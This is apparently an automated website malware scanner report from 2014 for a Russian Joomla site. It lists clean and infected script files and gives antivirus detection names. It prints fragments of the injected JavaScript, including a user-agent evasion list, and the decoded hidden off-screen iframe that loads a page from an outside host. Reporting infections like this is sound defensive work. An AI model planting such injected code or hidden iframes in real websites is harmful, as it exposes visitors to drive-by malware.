New scan:

Malware Scanner report for matveeva-lichnost.ru

Malicious/Suspicious/Total urls checked
3/6/15
9 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "matveeva-lichnost.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=matveeva-lichnost.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://matveeva-lichnost.ru/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://matveeva-lichnost.ru/
200 OK
Content-Length: 40684
Content-Type: text/html
clean
http://matveeva-lichnost.ru/plugins/system/jceutilities/js/jceutilities.js?v=2.2.3
200 OK
Content-Length: 28221
Content-Type: application/javascript
clean
http://matveeva-lichnost.ru/plugins/system/mediaobject/js/mediaobject-150.js
200 OK
Content-Length: 5407
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function braborossa(){
var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Firefox/25.0|Chromium|Linux|Macintosh';
denygros
... 3585 bytes are skipped ...
);
}
}
function writeFlash(p) {
MediaObject.flash(p);
}
function writeShockWave(p) {
MediaObject.shockwave(p);
}
function writeQuickTime(p) {
MediaObject.quicktime(p);
}
function writeRealMedia(p) {
MediaObject.realmedia(p);
}
function writeWindowsMedia(p) {
MediaObject.windowsmedia(p);
}
function writeDivX(p) {
MediaObject.divx(p);
}
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
DrWeb
JS.IFrame.566
Fortinet
JS/IFrame.XX!tr
AVG
HTML/Framer
Sophos
Troj/JSRedir-LH

http://matveeva-lichnost.ru/components/com_jcomments/js/jcomments-v2.1.js?v=2
200 OK
Content-Length: 28716
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function braborossa(){
var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Firefox/25.0|Chromium|Linux|Macintosh';
denygros
... 3315 bytes are skipped ...
be: function(o,g){return this.ajax('JCommentsSubscribe',arguments);},
unsubscribe: function(o,g){return this.ajax('JCommentsUnsubscribe',arguments);},
updateSubscription: function(m,t){var e=this.$('comments-subscription');if(e){var jc=this;e.innerHTML=t;e.onclick=m?function(){jc.unsubscribe(jc.oi,jc.og);return false;}:function(){jc.subscribe(jc.oi,jc.og);return false;};e.blur();}},
go: function(l){window.open(l);return;}
};;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Decoded script:


<iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe>

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
DrWeb
JS.IFrame.566
Fortinet
JS/IFrame.XX!tr
Avira
HTML/Rce.Gen
Sophos
Troj/JSRedir-LH

http://matveeva-lichnost.ru/components/com_jcomments/libraries/joomlatune/ajax.js
200 OK
Content-Length: 5515
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function braborossa(){
var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Firefox/25.0|Chromium|Linux|Macintosh';
denygros
... 3506 bytes are skipped ...
': if(obj){eval("obj."+property+"=data;");} break;
case 'al': if(data){alert(data);} break;
case 'js': if(data){eval(data);} break;
default: this.error('Unknown command: ' + cmd);break;
}
}

delete result;
delete cmd;
delete id;
delete property;
delete data;
delete obj;
return true;
};
this.error = function(){};
}
var jtajax = new jtAJAX();
};;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Decoded script:


<iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe>

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
DrWeb
JS.IFrame.566
Fortinet
JS/IFrame.XX!tr
Avira
HTML/Rce.Gen
Sophos
Troj/JSRedir-LH

http://matveeva-lichnost.ru/media/system/js/caption.js
200 OK
Content-Length: 3500
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function braborossa(){
var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Fire
...[2637 bytes skipped]...

Decoded script:


<iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe>

http://matveeva-lichnost.ru/plugins/system/modalizer/modals/jquery.min.js
404 Not Found
Content-Length: 243
Content-Type: text/html
clean
http://matveeva-lichnost.ru/test404page.js
404 Not Found
Content-Length: 212
Content-Type: text/html
clean
http://matveeva-lichnost.ru/plugins/system/modalizer/modals/fancybox/jquery.fancybox-1.3.1.pack.js
200 OK
Content-Length: 14731
Content-Type: application/javascript
clean
http://matveeva-lichnost.ru/plugins/content/highslide/highslide-with-html.js
200 OK
Content-Length: 64409
Content-Type: application/javascript
clean
http://matveeva-lichnost.ru/plugins/content/highslide/swfobject.js
200 OK
Content-Length: 8426
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function braborossa(){
var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Fire
...[3752 bytes skipped]...

Decoded script:


<iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe>

http://matveeva-lichnost.ru/plugins/content/highslide/do_cookie.js
200 OK
Content-Length: 3994
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function braborossa(){
var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Fire
...[3369 bytes skipped]...

Decoded script:


<iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe>

http://matveeva-lichnost.ru/templates/matveeva3/script.js
200 OK
Content-Length: 12592
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function braborossa(){
var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Fire
...[4019 bytes skipped]...

Decoded script:


<iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe>

http://matveeva-lichnost.ru/modules/mod_pagepeel_banner/pagepeel_banner/AC_OETags.js
200 OK
Content-Length: 9364
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function braborossa(){
var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Fire
...[4099 bytes skipped]...

Decoded script:


<iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe>

http://matveeva-lichnost.ru/modules/mod_googlecurrencyconverter/mod_googlecurrencyconverter_ajax.js
200 OK
Content-Length: 4788
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function braborossa(){
var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Fire
...[4453 bytes skipped]...

Decoded script:


<iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe>


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: matveeva-lichnost.ru

Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sat, 27 Sep 2014 10:14:30 GMT
Pragma: no-cache
Server: nginx/1.7.0
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 27 Sep 2014 10:14:30 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: cfbd16b4c51a0eeaa3697595e5323185=vpdo8rpkjen428ts095ojkmh13; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: matveeva-lichnost.ru
Referer: http://www.google.com/search?q=matveeva-lichnost.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.